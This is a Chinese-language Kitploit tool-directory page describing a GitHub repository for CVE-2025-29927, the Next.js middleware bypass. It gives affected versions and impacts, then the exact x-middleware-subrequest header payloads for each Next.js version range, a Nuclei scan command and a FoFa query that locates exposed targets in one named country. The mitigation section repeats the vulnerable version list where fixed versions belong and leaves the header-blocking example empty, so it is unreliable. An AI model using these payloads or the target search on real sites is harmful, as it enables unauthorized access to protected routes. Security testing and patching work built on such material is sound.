Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-29927 — CVE-2025-29927:Next.js 中间件绕过漏洞 | Kitploit
工具/GitHubGitHub/kh4sh3i/cve-2025-29927
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927:Next.js 中间件绕过漏洞

查看仓库
241年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享



CVE-2025-29927

CVE-2025-29927:Next.js 中间件绕过漏洞 此仓库演示了 Next.js 中的 CVE-2025-29927 漏洞,其中内部标头 x-middleware-subrequest 可用于绕过诸如身份验证等中间件检查。

受影响版本

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

缓解与修复

  • 将 Next.js 升级到已修复的版本:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • 如果无法立即升级,请在 Web 服务器或代理层面阻止或剥离 x-middleware-subrequest 标头:

影响场景

  • 授权绕过:攻击者无需正确的身份验证或授权即可访问受保护的路由。
  • 内容安全策略 (CSP) 绕过:如果通过中间件添加了 CSP 标头,攻击者可以绕过这些安全控制,可能引发跨站脚本 (XSS) 攻击。
  • 通过缓存投毒导致拒绝服务:在某些配置中,攻击者可以通过绕过设置缓存控制标头的中间件,用未经授权的内容污染缓存。

使用 nextjs-CVE-2025-29927 Nuclei 模板

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

跨不同 Next.js 版本的利用

  • 对于 12.2 之前的版本:
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • 对于 12.2 及更高版本:
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • 对于 13.2.0 及更高版本:
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

使用 FoFa 搜索目标

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

免费 CTF 资源

  • CTF
下载工具